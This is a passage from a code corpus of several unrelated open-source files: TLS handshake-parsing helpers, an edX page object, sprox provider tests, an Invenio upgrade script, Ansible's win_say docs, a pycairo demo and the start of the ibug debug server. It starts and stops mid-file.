:param server_handshake_bytes: A byte string of the handshake data received from the server :param client_handshake_bytes: A byte string of the handshake data sent to the server :return: A dict with the following keys: - "protocol": unicode string - "cipher_suite": unicode string - "compression": boolean - "session_id": "new", "reused" or None - "session_ticket: "new", "reused" or None """ protocol = None cipher_suite = None compression = False session_id = None session_ticket = None server_session_id = None client_session_id = None for record_type, _, record_data in _parse_tls_records(server_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): # Ensure we are working with a ServerHello message if message_type != b'\x02': continue protocol = { b'\x03\x00': "SSLv3", b'\x03\x01': "TLSv1", b'\x03\x02': "TLSv1.1", b'\x03\x03': "TLSv1.2", b'\x03\x04': "TLSv1.3", }[message_data[0:2]] session_id_length = int_from_bytes(message_data[34:35]) if session_id_length > 0: server_session_id = message_data[35:35 + session_id_length] cipher_suite_start = 35 + session_id_length cipher_suite_bytes = message_data[cipher_suite_start:cipher_suite_start + 2] cipher_suite = CIPHER_SUITE_MAP[cipher_suite_bytes] compression_start = cipher_suite_start + 2 compression = message_data[compression_start:compression_start + 1] != b'\x00' extensions_length_start = compression_start + 1 extensions_data = message_data[extensions_length_start:] for extension_type, extension_data in _parse_hello_extensions(extensions_data): if extension_type == 35: session_ticket = "new" break break for record_type, _, record_data in _parse_tls_records(client_handshake_bytes): if record_type != b'\x16': continue for message_type, message_data in _parse_handshake_messages(record_data): # Ensure we are working with a ClientHello message if message_type != b'\x01': continue session_id_length = int_from_bytes(message_data[34:35]) if 
session_id_length > 0: client_session_id = message_data[35:35 + session_id_length] cipher_suite_start = 35 + session_id_length cipher_suite_length = int_from_bytes(message_data[cipher_suite_start:cipher_suite_start + 2]) compression_start = cipher_suite_start + 2 + cipher_suite_length compression_length = int_from_bytes(message_data[compression_start:compression_start + 1]) # On subsequent requests, the session ticket will only be seen # in the ClientHello message if server_session_id is None and session_ticket is None: extensions_length_start = compression_start + 1 + compression_length extensions_data = message_data[extensions_length_start:] for extension_type, extension_data in _parse_hello_extensions(extensions_data): if extension_type == 35: session_ticket = "reused" break break if server_session_id is not None: if client_session_id is None: session_id = "new" else: if client_session_id != server_session_id: session_id = "new" else: session_id = "reused" return { "protocol": protocol, "cipher_suite": cipher_suite, "compression": compression, "session_id": session_id, "session_ticket": session_ticket, } def _parse_tls_records(data): """ Creates a generator returning tuples of information about each record in a byte string of data from a TLS client or server. Stops as soon as it find a ChangeCipherSpec message since all data from then on is encrypted. 
:param data: A byte string of TLS records :return: A generator that yields 3-element tuples: [0] Byte string of record type [1] Byte string of protocol version [2] Byte string of record data """ pointer = 0 data_len = len(data) while pointer < data_len: # Don't try to parse any more once the ChangeCipherSpec is found if data[pointer:pointer + 1] == b'\x14': break length = int_from_bytes(data[pointer + 3:pointer + 5]) yield ( data[pointer:pointer + 1], data[pointer + 1:pointer + 3], data[pointer + 5:pointer + 5 + length] ) pointer += 5 + length def _parse_handshake_messages(data): """ Creates a generator returning tuples of information about each message in a byte string of data from a TLS handshake record :param data: A byte string of a TLS handshake record data :return: A generator that yields 2-element tuples: [0] Byte string of message type [1] Byte string of message data """ pointer = 0 data_len = len(data) while pointer < data_len: length = int_from_bytes(data[pointer + 1:pointer + 4]) yield ( data[pointer:pointer + 1], data[pointer + 4:pointer + 4 + length] ) pointer += 4 + length def _parse_hello_extensions(data): """ Creates a generator returning tuples of information about each extension from a byte string of extension data contained in a ServerHello ores ClientHello message :param data: A byte string of a extension data from a TLS ServerHello or ClientHello message :return: A generator that yields 2-element tuples: [0] Byte string of extension type [1] Byte string of extension data """ if data == b'': return extentions_length = int_from_bytes(data[0:2]) extensions_start = 2 extensions_end = 2 + extentions_length pointer = extensions_start while pointer < extensions_end: extension_type = int_from_bytes(data[pointer:pointer + 2]) extension_length = int_from_bytes(data[pointer + 2:pointer + 4]) yield ( extension_type, data[pointer + 4:pointer + 4 + extension_length] ) pointer += 4 + extension_length def raise_hostname(certificate, hostname): """ Raises a 
TLSVerificationError due to a hostname mismatch :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ is_ip = re.match('^\\d+\\.\\d+\\.\\d+\\.\\d+$', hostname) or hostname.find(':') != -1 if is_ip: hostname_type = 'IP address %s' % hostname else: hostname_type = 'domain name %s' % hostname message = 'Server certificate verification failed - %s does not match' % hostname_type valid_ips = ', '.join(certificate.valid_ips) valid_domains = ', '.join(certificate.valid_domains) if valid_domains: message += ' valid domains: %s' % valid_domains if valid_domains and valid_ips: message += ' or' if valid_ips: message += ' valid IP addresses: %s' % valid_ips raise TLSVerificationError(message, certificate) def raise_verification(certificate): """ Raises a generic TLSVerificationError :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed' raise TLSVerificationError(message, certificate) def raise_weak_signature(certificate): """ Raises a TLSVerificationError when a certificate uses a weak signature algorithm :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed - weak certificate signature algorithm' raise TLSVerificationError(message, certificate) def raise_client_auth(): """ Raises a TLSError indicating client authentication is required :raises: TLSError """ message = 'TLS handshake failed - client authentication required' raise TLSError(message) def raise_revoked(certificate): """ Raises a TLSVerificationError due to the certificate being revoked :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed - certificate has been revoked' raise TLSVerificationError(message, certificate) def raise_no_issuer(certificate): """ Raises a TLSVerificationError due to no issuer certificate found 
in trust roots :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed - certificate issuer not found in trusted root certificate store' raise TLSVerificationError(message, certificate) def raise_self_signed(certificate): """ Raises a TLSVerificationError due to a self-signed certificate roots :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed - certificate is self-signed' raise TLSVerificationError(message, certificate) def raise_expired_not_yet_valid(certificate): """ Raises a TLSVerificationError due to certificate being expired, or not yet being valid :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ validity = certificate['tbs_certificate']['validity'] not_after = validity['not_after'].native not_before = validity['not_before'].native now = datetime.now(timezone.utc) if not_before > now: formatted_before = not_before.strftime('%Y-%m-%d %H:%M:%SZ') message = 'Server certificate verification failed - certificate not valid until %s' % formatted_before elif not_after < now: formatted_after = not_after.strftime('%Y-%m-%d %H:%M:%SZ') message = 'Server certificate verification failed - certificate expired %s' % formatted_after raise TLSVerificationError(message, certificate) def raise_disconnection(): """ Raises a TLSError due to a disconnection :raises: TLSError """ raise TLSError('The remote end closed the connection') def raise_protocol_error(server_handshake_bytes): """ Raises a TLSError due to a protocol error :param server_handshake_bytes: A byte string of the handshake data received from the server :raises: TLSError """ other_protocol = detect_other_protocol(server_handshake_bytes) if other_protocol: raise TLSError('TLS protocol error - server responded using %s' % other_protocol) raise TLSError('TLS protocol error - server responded using a 
different protocol') def raise_handshake(): """ Raises a TLSError due to a handshake error :raises: TLSError """ raise TLSError('TLS handshake failed') def raise_dh_params(): """ Raises a TLSError due to weak DH params :raises: TLSError """ raise TLSError('TLS handshake failed - weak DH parameters') def detect_other_protocol(server_handshake_bytes): """ Looks at the server handshake bytes to try and detect a different protocol :param server_handshake_bytes: A byte string of the handshake data received from the server :return: None, or a unicode string of "ftp", "http", "imap", "pop3", "smtp" """ if server_handshake_bytes[0:5] == b'HTTP/': return 'HTTP' if server_handshake_bytes[0:4] == b'220 ': if re.match(b'^[^\r\n]*ftp', server_handshake_bytes, re.I): return 'FTP' else: return 'SMTP' if server_handshake_bytes[0:4] == b'220-': return 'FTP' if server_handshake_bytes[0:4] == b'+OK ': return 'POP3' if server_handshake_bytes[0:4] == b'* OK' or server_handshake_bytes[0:9] == b'* PREAUTH': return 'IMAP' return None
gpl-2.0
shubhdev/edx-platform
common/test/acceptance/pages/lms/course_nav.py
96
7770
""" Course navigation page object """ import re from bok_choy.page_object import PageObject from bok_choy.promise import EmptyPromise class CourseNavPage(PageObject): """ Navigate sections and sequences in the courseware. """ url = None def is_browser_on_page(self): return self.q(css='div.course-index').present @property def sections(self): """ Return a dictionary representation of sections and subsections. Example: { 'Introduction': ['Course Overview'], 'Week 1': ['Lesson 1', 'Lesson 2', 'Homework'] 'Final Exam': ['Final Exam'] } You can use these titles in `go_to_section` to navigate to the section. """ # Dict to store the result nav_dict = dict() section_titles = self._section_titles() # Get the section titles for each chapter for sec_index, sec_title in enumerate(section_titles): if len(section_titles) < 1: self.warning("Could not find subsections for '{0}'".format(sec_title)) else: # Add one to convert list index (starts at 0) to CSS index (starts at 1) nav_dict[sec_title] = self._subsection_titles(sec_index + 1) return nav_dict @property def sequence_items(self): """ Return a list of sequence items on the page. Sequence items are one level below subsections in the course nav. Example return value: ['Chemical Bonds Video', 'Practice Problems', 'Homework'] """ seq_css = 'ol#sequence-list>li>a>p' return self.q(css=seq_css).map(self._clean_seq_titles).results def go_to_section(self, section_title, subsection_title): """ Go to the section in the courseware. Every section must have at least one subsection, so specify both the section and subsection title. 
Example: go_to_section("Week 1", "Lesson 1") """ # For test stability, disable JQuery animations (opening / closing menus) self.browser.execute_script("jQuery.fx.off = true;") # Get the section by index try: sec_index = self._section_titles().index(section_title) except ValueError: self.warning("Could not find section '{0}'".format(section_title)) return # Click the section to ensure it's open (no harm in clicking twice if it's already open) # Add one to convert from list index to CSS index section_css = 'nav>div.chapter:nth-of-type({0})>h3>a'.format(sec_index + 1) self.q(css=section_css).first.click() # Get the subsection by index try: subsec_index = self._subsection_titles(sec_index + 1).index(subsection_title) except ValueError: msg = "Could not find subsection '{0}' in section '{1}'".format(subsection_title, section_title) self.warning(msg) return # Convert list indices (start at zero) to CSS indices (start at 1) subsection_css = "nav>div.chapter:nth-of-type({0})>ul>li:nth-of-type({1})>a".format( sec_index + 1, subsec_index + 1 ) # Click the subsection and ensure that the page finishes reloading self.q(css=subsection_css).first.click() self._on_section_promise(section_title, subsection_title).fulfill() def go_to_sequential(self, sequential_title): """ Within a section/subsection, navigate to the sequential with `sequential_title`. """ # Get the index of the item in the sequence all_items = self.sequence_items try: seq_index = all_items.index(sequential_title) except ValueError: msg = "Could not find sequential '{0}'. Available sequentials: [{1}]".format( sequential_title, ", ".join(all_items) ) self.warning(msg) else: # Click on the sequence item at the correct index # Convert the list index (starts at 0) to a CSS index (starts at 1) seq_css = "ol#sequence-list>li:nth-of-type({0})>a".format(seq_index + 1) self.q(css=seq_css).first.click() def _section_titles(self): """ Return a list of all section titles on the page. 
""" chapter_css = 'nav > div.chapter > h3 > a' return self.q(css=chapter_css).map(lambda el: el.text.strip()).results def _subsection_titles(self, section_index): """ Return a list of all subsection titles on the page for the section at index `section_index` (starts at 1). """ # Retrieve the subsection title for the section # Add one to the list index to get the CSS index, which starts at one subsection_css = 'nav>div.chapter:nth-of-type({0})>ul>li>a>p:nth-of-type(1)'.format(section_index) # If the element is visible, we can get its text directly # Otherwise, we need to get the HTML # It *would* make sense to always get the HTML, but unfortunately # the open tab has some child <span> tags that we don't want. return self.q( css=subsection_css ).map( lambda el: el.text.strip().split('\n')[0] if el.is_displayed() else el.get_attribute('innerHTML').strip() ).results def _on_section_promise(self, section_title, subsection_title): """ Return a `Promise` that is fulfilled when the user is on the correct section and subsection. """ desc = "currently at section '{0}' and subsection '{1}'".format(section_title, subsection_title) return EmptyPromise( lambda: self._is_on_section(section_title, subsection_title), desc ) def _is_on_section(self, section_title, subsection_title): """ Return a boolean indicating whether the user is on the section and subsection with the specified titles. This assumes that the currently expanded section is the one we're on That's true right after we click the section/subsection, but not true in general (the user could go to a section, then expand another tab). 
""" current_section_list = self.q(css='nav>div.chapter.is-open>h3>a').text current_subsection_list = self.q(css='nav>div.chapter.is-open li.active>a>p').text if len(current_section_list) == 0: self.warning("Could not find the current section") return False elif len(current_subsection_list) == 0: self.warning("Could not find current subsection") return False else: return ( current_section_list[0].strip() == section_title and current_subsection_list[0].strip().split('\n')[0] == subsection_title ) # Regular expression to remove HTML span tags from a string REMOVE_SPAN_TAG_RE = re.compile(r'<span.+/span>') def _clean_seq_titles(self, element): """ Clean HTML of sequence titles, stripping out span tags and returning the first line. """ return self.REMOVE_SPAN_TAG_RE.sub('', element.get_attribute('innerHTML')).strip().split('\n')[0] def go_to_sequential_position(self, sequential_position): """ Within a section/subsection navigate to the sequential position specified by `sequential_position`. Arguments: sequential_position (int): position in sequential bar """ sequential_position_css = '#tab_{0}'.format(sequential_position - 1) self.q(css=sequential_position_css).first.click()
agpl-3.0
gjhiggins/sprox
tests/test_saormprovider.py
1
13417
from nose import SkipTest from sprox.sa.provider import SAORMProvider from sprox.test.base import setup_database, setup_records, SproxTest from sprox.test.model import * from sprox.sa.widgetselector import SAWidgetSelector import sqlalchemy from sqlalchemy.orm import mapper, lazyload from sqlalchemy import MetaData, Table, Column, Integer from sqlalchemy.engine import Engine from nose.tools import raises, eq_ import datetime from cgi import FieldStorage from io import StringIO session = None engine = None connection = None trans = None def setup(): global session, engine, metadata, trans session, engine, metadata = setup_database() class DummyEngine(Engine): def __init__(self): pass url = 'dummy!' other_engine = DummyEngine() other_metadata = MetaData(bind=other_engine) class OtherClass(object):pass other_table = Table('other_table', other_metadata, Column('other_id', Integer, primary_key=True)) mapper(OtherClass, other_table) class TestSAORMProvider(SproxTest): def setup(self): super(TestSAORMProvider, self).setup() self.provider = SAORMProvider(session) session.add(Department(department_id=1, name='Marketing')) session.add(Department(department_id=2, name='Accounting')) session.add(DocumentCategory(document_category_id=1, department_id=1, name='Brochure')) session.add(DocumentCategory(document_category_id=2, department_id=1, name='Flyer')) session.add(DocumentCategory(document_category_id=3, department_id=2, name='Balance Sheet')) session.add(Permission(permission_name='perm')) #session.add(DocumentRating(user_id=1, document_id=1, rating=5)) self.provider.flush() def test_get_fields_with_func(self): eq_(self.provider.get_fields(lambda: Town), ['town_id', 'name', 'town_id', 'name']) def test_isbinary_related(self): assert not self.provider.is_binary(User, 'groups') def test_isrelation_onproperty(self): assert not self.provider.is_relation(User, 'permissions') def test_is_query_not_a_query(self): assert self.provider.is_query(User, None) == False def 
test_is_query_with_dynamic(self): e = session.query(Permission).first() assert self.provider.is_query(Permission, e.groups) == True def test_isbinary_synonym(self): assert not self.provider.is_binary(User, 'password') assert self.provider.is_binary(File, 'content') def test_isstring(self): assert self.provider.is_string(User, 'email_address') assert not self.provider.is_string(User, 'groups') def test_isstring_synonym(self): assert self.provider.is_string(User, 'password') def test_binary_create(self): from io import BytesIO fs = FieldStorage() fs.file = BytesIO(b'fake_content') values = {'data':fs} self.provider.create(File, values) def test_binary_update(self): from io import BytesIO fs = FieldStorage() fs.file = BytesIO(b'fake_content') values = {'data':fs} entity = self.provider.create(File, values) values = {'data':fs, 'file_id':entity.file_id} self.provider.update(File, values) def test_create_with_engine(self): provider = SAORMProvider(engine) assert provider.engine == engine def test_create_with_metadata(self): provider = SAORMProvider(metadata) assert provider.engine == engine def test_create_with_session(self): provider = SAORMProvider(session) assert provider.engine == engine def test_get_entity(self): entity = self.provider.get_entity('User') assert entity == User @raises(KeyError) def test_get_entity_non_matching_engine(self): entity = self.provider.get_entity('OtherClass') def test_get_primary_fields(self): fields = self.provider.get_primary_fields(User) eq_(fields, ['user_id']) def test_get_primary_fields_multi(self): fields = self.provider.get_primary_fields(DocumentCategory) eq_(fields, ['document_category_id', 'department_id']) def test_get_primary_field_function(self): field = self.provider.get_primary_field(lambda: User) eq_(field, 'user_id') def test_get_view_field_name(self): field = self.provider.get_view_field_name(Group, ['name']) eq_(field, 'group_name') def test_get_view_field_name_with_title(self): """ if it exists, saormprovider should 
use the 'title' info attribute to determine the title column """ field = self.provider.get_view_field_name(User, ['name']) eq_(field, 'email_address') def test_get_view_field_name_not_found(self): field = self.provider.get_view_field_name(Group, []) eq_(field, 'group_id') def test_get_dropdown_options_fk(self): options = self.provider.get_dropdown_options(User, 'town') eq_(options, [(1, 'Arvada'), (2, 'Denver'), (3, 'Golden'), (4, 'Boulder')]) def test_get_dropdown_options_fk_multi(self): options = self.provider.get_dropdown_options(Document, 'category') eq_(options, [('1/1', 'Brochure'), ('2/1', 'Flyer'), ('3/2', 'Balance Sheet')]) def test_get_dropdown_options_join(self): options = self.provider.get_dropdown_options(User, 'groups') eq_(options, [(1, '0'), (2, '1'), (3, '2'), (4, '3'), (5, '4')]) def test_get_dropdown_options_join_2(self): options = self.provider.get_dropdown_options(Group, 'users') eq_(options, [(1, 'asdf@asdf.com'),]) def test_dropdown_options_warn(self): provider = SAORMProvider(metadata) options = provider.get_dropdown_options(User, 'town') eq_(options, []) def test_get_relations(self): relations = self.provider.get_relations(User) eq_(relations, ['town', 'groups']) def test_get_synonyms(self): synonyms = self.provider.get_synonyms(User) eq_(synonyms, ['password']) def test_dictify(self): d = self.provider.dictify(self.user) eq_(d['groups'], [5]) eq_(d['user_name'], 'asdf') def test_dictify_limit_fields(self): d = self.provider.dictify(self.user, fields=['user_name']) eq_(d['user_name'], 'asdf') eq_(list(d.keys()), ['user_name']) def test_dictify_omit_fields(self): d = self.provider.dictify(self.user, omit_fields=['password', '_password']) assert 'password' not in list(d.keys()) assert '_password' not in list(d.keys()) assert 'user_name' in list(d.keys()) def test_dictify_dynamic_relation(self): e = session.query(Permission).first() d = self.provider.dictify(e) assert isinstance(d['groups'], list) def test_dictify_none(self): d = 
self.provider.dictify(None) eq_(d, {}) def test_create(self): params = {'user_name':'asdf2', 'password':'asdf2', 'email_address':'email@addy.com', 'groups':[1,4], 'town':2} new_user = self.provider.create(User, params) q_user = self.session.query(User).get(2) assert q_user == new_user def test_create_many_to_one_multi(self): params = {'category': '1/1'} new_ref = self.provider.create(DocumentCategoryReference, params) q_ref = self.session.query(DocumentCategoryReference).get(1) assert new_ref == q_ref def test_create_many_to_many_multi(self): params = {'categories': ['1/1', '1/2']} new_ratingref = self.provider.create(DocumentCategoryTag, params) q_ratingref = self.session.query(DocumentCategoryTag).get(1) assert new_ratingref == q_ratingref def test_query(self): r = self.provider.query(User, limit=20, offset=0) eq_(len(r), 2) def test_query_order_by(self): r = self.provider.query(Document, limit=20, offset=0, order_by='category') eq_(len(r), 2) def test_query_filters(self): cnt, r = self.provider.query(Town, filters={'name':'Golden'}) eq_([t.name for t in r], ['Golden']) def test_query_filters_relations(self): cnt, r = self.provider.query(User, filters={'town':1}) assert r[0].town.town_id == 1, r def test_query_filters_relations_many(self): cnt, r = self.provider.query(User, filters={'groups':[5]}) assert r[0].groups[0].group_id == 5, r def test_query_filters_substring(self): cnt, r = self.provider.query(Town, filters={'name':'old'}, substring_filters=['name']) eq_([t.name for t in r], ['Golden']) def test_query_filters_substring_escaping(self): cnt, r = self.provider.query(Town, filters={'name':'o%l%d'}, substring_filters=['name']) eq_(r, []) def test_query_filters_substring_notstring(self): cnt, towns = self.provider.query(Town) cnt, r = self.provider.query(Town, filters={'town_id':towns[0].town_id}, substring_filters=['town_id']) eq_([t.name for t in r], [towns[0].name]), r cnt, r = self.provider.query(Town, filters={'town_id':'not-an-id'}, 
substring_filters=['town_id']) eq_(r, []), r def test_query_filters_substring_insensitive(self): cnt, r = self.provider.query(Town, filters={'name':'gold'}, substring_filters=['name']) eq_([t.name for t in r], ['Golden']) def test_query_filters_substring_disabled(self): cnt, r = self.provider.query(Town, filters={'name':'old'}, substring_filters=[]) eq_(r, []) def test_update(self): params = {'user_name':'asdf2', 'password':'asdf2', 'email_address':'email@addy.com', 'groups':[1,4], 'town':2} new_user = self.provider.create(User, params) params['email_address'] = 'asdf@asdf.commy' params['created'] = '2008-3-30 12:21:21' params['user_id'] = 2 new_user = self.provider.update(User, params) q_user = self.session.query(User).get(2) eq_(new_user.email_address, 'asdf@asdf.commy') def test_update_omit(self): params = {'user_name':'asdf2', 'password':'asdf2', 'email_address':'email@addy.com', 'groups':[1,4], 'town':2} new_user = self.provider.create(User, params) params = {} params['email_address'] = 'asdf@asdf.commy' params['created'] = '2008-3-30 12:21:21' params['user_id'] = 2 new_user = self.provider.update(User, params, omit_fields=['email_address', 'groups']) q_user = self.session.query(User).get(2) eq_(q_user.email_address, 'email@addy.com') eq_([group.group_id for group in q_user.groups], [1,4]) def test_get_default_values(self): assert {} == self.provider.get_default_values(User, {}) def test_get(self): user = self.provider.get(User, params={'user_id':1}) eq_(user['user_name'], 'asdf') def test_delete(self): #causes some kind of persistence error in SA 0.7 (rollback not working) if sqlalchemy.__version__ > '0.6.6': raise SkipTest user = self.provider.delete(User, params={'user_id':1}) users = self.session.query(User).all() assert len(users) == 0 def test_modify_params_for_datetimes(self): params = self.provider._modify_params_for_dates(Example, {'datetime_': '1978-8-29 12:34:56'}) eq_(params, {'datetime_': datetime.datetime(1978, 8, 29, 12, 34, 56)}) def 
test_modify_params_for_dates(self): params = self.provider._modify_params_for_dates(Example, {'date_': '1978-8-29'}) eq_(params, {'date_': datetime.date(1978, 8, 29)}) def test_modify_params_for_intervals(self): params = self.provider._modify_params_for_dates(Example, {'interval': '1 days, 3:20:01'}) eq_(params, {'interval': datetime.timedelta(days=1, hours=3, minutes=20, seconds=1)}) def test_modify_params_for_relationships_params_with_instance_already(self): group = self.session.query(Group).get(1) params = {'groups':group} params = self.provider._modify_params_for_relationships(User, params) assert params['groups'] == [group], params def test_get_field_widget_args(self): a = self.provider.get_field_widget_args(User, 'groups', User.groups) eq_(a, {'nullable': False, 'provider': self.provider}) def test_create_with_unicode_cast_to_int(self): self.provider.create(User, dict(user_id='34', user_name='something')) def test_create_relationships_with_wacky_relation(self): obj = session.query(Group).first() params = {'group_id':obj.group_id, 'users':1} self.provider.update(Group, params) user = session.query(User).get(1) assert user in obj.users def test_create_relationships_remove_groups(self): obj = session.query(Group).first() obj.users.append(self.user) self.provider.update(User, {'user_id':self.user.user_id, 'groups':[]}) session.flush() user = session.query(User).get(1) assert user not in obj.users def test_create_relationships_remove_town(self): town = session.query(Town).first() self.user.town = town self.session.flush() self.provider.update(User, {'user_id':self.user.user_id, 'town':None}) assert self.user.town is None
mit
egabancho/invenio-upgrader
invenio_upgrader/upgrades/invenio_2015_03_03_tag_value.py
20
1475
# -*- coding: utf-8 -*- # # This file is part of Invenio. # Copyright (C) 2015 CERN. # # Invenio is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 2 of the # License, or (at your option) any later version. # # Invenio is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Invenio; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """Modifies column `tag.value`.""" from invenio.legacy.dbquery import run_sql depends_on = ['invenio_2012_11_15_hstRECORD_marcxml_longblob'] def info(): """Return upgrade recipe information.""" return "Modifies column tag.value" def do_upgrade(): """Carry out the upgrade.""" create_statement = run_sql('SHOW CREATE TABLE tag')[0][1] if 'affected_fields' not in create_statement: run_sql("ALTER TABLE tag MODIFY COLUMN value VARCHAR(6) default ''") def estimate(): """Estimate running time of upgrade in seconds (optional).""" return 1 def pre_upgrade(): """Pre-upgrade checks.""" pass def post_upgrade(): """Post-upgrade checks.""" pass
gpl-2.0
wrouesnel/ansible
lib/ansible/modules/windows/win_say.py
47
4581
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2016, Jon Hawkesworth (@jhawkesworth) <figs@unity.demon.co.uk> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # this is a windows documentation stub. actual code lives in the .ps1 # file of the same name ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: win_say version_added: "2.3" short_description: Text to speech module for Windows to speak messages and optionally play sounds description: - Uses .NET libraries to convert text to speech and optionally play .wav sounds. Audio Service needs to be running and some kind of speakers or headphones need to be attached to the windows target(s) for the speech to be audible. options: msg: description: - The text to be spoken. - Use either C(msg) or C(msg_file). - Optional so that you can use this module just to play sounds. msg_file: description: - Full path to a windows format text file containing the text to be spokend. - Use either C(msg) or C(msg_file). - Optional so that you can use this module just to play sounds. voice: description: - Which voice to use. See notes for how to discover installed voices. - If the requested voice is not available the default voice will be used. Example voice names from Windows 10 are C(Microsoft Zira Desktop) and C(Microsoft Hazel Desktop). 
default: system default voice speech_speed: description: - How fast or slow to speak the text. - Must be an integer value in the range -10 to 10. - -10 is slowest, 10 is fastest. default: 0 start_sound_path: description: - Full path to a C(.wav) file containing a sound to play before the text is spoken. - Useful on conference calls to alert other speakers that ansible has something to say. end_sound_path: description: - Full path to a C(.wav) file containing a sound to play after the text has been spoken. - Useful on conference calls to alert other speakers that ansible has finished speaking. author: - Jon Hawkesworth (@jhawkesworth) notes: - Needs speakers or headphones to do anything useful. - | To find which voices are installed, run the following Powershell commands. Add-Type -AssemblyName System.Speech $speech = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer $speech.GetInstalledVoices() | ForEach-Object { $_.VoiceInfo } $speech.Dispose() - Speech can be surprisingly slow, so it's best to keep message text short. ''' EXAMPLES = r''' - name: Warn of impending deployment win_say: msg: Warning, deployment commencing in 5 minutes, please log out. - name: Using a different voice and a start sound win_say: start_sound_path: C:\Windows\Media\ding.wav msg: Warning, deployment commencing in 5 minutes, please log out. voice: Microsoft Hazel Desktop - name: With start and end sound win_say: start_sound_path: C:\Windows\Media\Windows Balloon.wav msg: New software installed end_sound_path: C:\Windows\Media\chimes.wav - name: Text from file example win_say: start_sound_path: C:\Windows\Media\Windows Balloon.wav msg_file: AppData\Local\Temp\morning_report.txt end_sound_path: C:\Windows\Media\chimes.wav ''' RETURN = r''' message_text: description: the text that the module attempted to speak returned: success type: string sample: "Warning, deployment commencing in 5 minutes." voice: description: the voice used to speak the text. 
returned: success type: string sample: Microsoft Hazel Desktop voice_info: description: the voice used to speak the text. returned: when requested voice could not be loaded type: string sample: Could not load voice TestVoice, using system default voice '''
gpl-3.0
gistnetserv-uah/eTorii
eGA3/pycairo/test/pygame-test2.py
10
1075
#!/usr/bin/env python """demonstrate pycairo and pygame method1: use an intermediate Python array object """ import array import math import sys import cairo import pygame def draw(surface): x,y, radius = (250,250, 200) ctx = cairo.Context(surface) ctx.set_line_width(15) ctx.arc(x, y, radius, 0, 2.0 * math.pi) ctx.set_source_rgb(0.8, 0.8, 0.8) ctx.fill_preserve() ctx.set_source_rgb(1, 1, 1) ctx.stroke() def input(events): for event in events: if event.type == pygame.QUIT: sys.exit(0) else: print event Width, Height = 512, 512 data = array.array('c', chr(0) * Width * Height * 4) stride = Width * 4 surface = cairo.ImageSurface.create_for_data(data, cairo.FORMAT_ARGB32,Width, Height, stride) pygame.init() window = pygame.display.set_mode( (Width,Height) ) screen = pygame.display.get_surface() draw(surface) #Create PyGame surface from Cairo Surface image = pygame.image.frombuffer(data.tostring(),(Width,Height),"ARGB",) #Tranfer to Screen screen.blit(image, (0,0)) pygame.display.flip() while True: input(pygame.event.get())
apache-2.0
johan/firebug
ibug/ibug.py
1
5421
from urlparse import urlparse from cgi import parse_qs from urllib import unquote import signal, thread, threading, time import BaseHTTPServer, SocketServer, mimetypes # ************************************************************************************************** # Globals global done, server, consoleCommand, phoneResponse done = False server = None phoneResponseEvent = threading.Event() consoleEvent = threading.Event() webPort = 1840 # ************************************************************************************************** class WebServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer): pass class WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(self): #print "%s" % self.path host, path, params, query = parseURL(self.path) if path == "/command": postConsoleCommand(query.get("message")) response = waitForPhoneResponse() self.respond(200, "application/x-javascript") self << response elif path == "/response": postPhoneResponse(query.get("message")) elif path == "/browser": self.respond(200, "text/html") self << getFormattedFile("browser.html") self.wfile.flush() while 1: message = waitForPhoneResponse() self << "<script>command('%s')</script>" % escapeJavaScript(message) self.wfile.flush() elif path == "/phone": self.respond(200, "text/html") self << getFormattedFile("phone.html") self.wfile.flush() while 1: message = waitForConsoleCommand() self << "<script>command('%s')</script>" % escapeJavaScript(message) self.wfile.flush() elif path == "/ibug.js": header = "var ibugHost = '%(hostName)s:%(port)s';" % getHostInfo() self.sendFile("ibug.js", header=header) else: self.sendFile(path[1:]) def respond(self, code=200, mimeType="text/plain"): self << "HTTP/1.1 %s %s\n" % (code, "OK") self << "Content-Type: %s\n" % mimeType self << "\n" def sendFile(self, path, mimeType=None, header=None): if not mimeType: mimeType = mimetypes.guess_type(path)[0] self.respond(200, mimeType) if header: self << header self << file(path).read() def 
__lshift__(self, text): self.wfile.write(text) # ************************************************************************************************** def serve(): print "Paste this code into the <head> of all HTML that will run on your iPhone:" print getFormattedFile("embed.html", getHostInfo()) url = "http://%(hostName)s:%(port)s/firebug.html" % getHostInfo() print "Load this page in your browser:\n" print " %s" % url print "\nFirebug server is running..." signal.signal(signal.SIGINT, terminate) # Run the server on a separate thread thread.start_new_thread(runServer, ()) global done while not done: try: time.sleep(0.3) except IOError: pass global server server.server_close() def runServer(): global server server = WebServer(("", webPort), WebRequestHandler) server.allow_reuse_address = True server.serve_forever() def terminate(sig_num, frame): global done done = True # ************************************************************************************************** def postConsoleCommand(message): global consoleCommand consoleCommand = message consoleEvent.set() def waitForConsoleCommand(): consoleEvent.wait() consoleEvent.clear() global consoleCommand return consoleCommand def postPhoneResponse(message): global phoneResponse phoneResponse 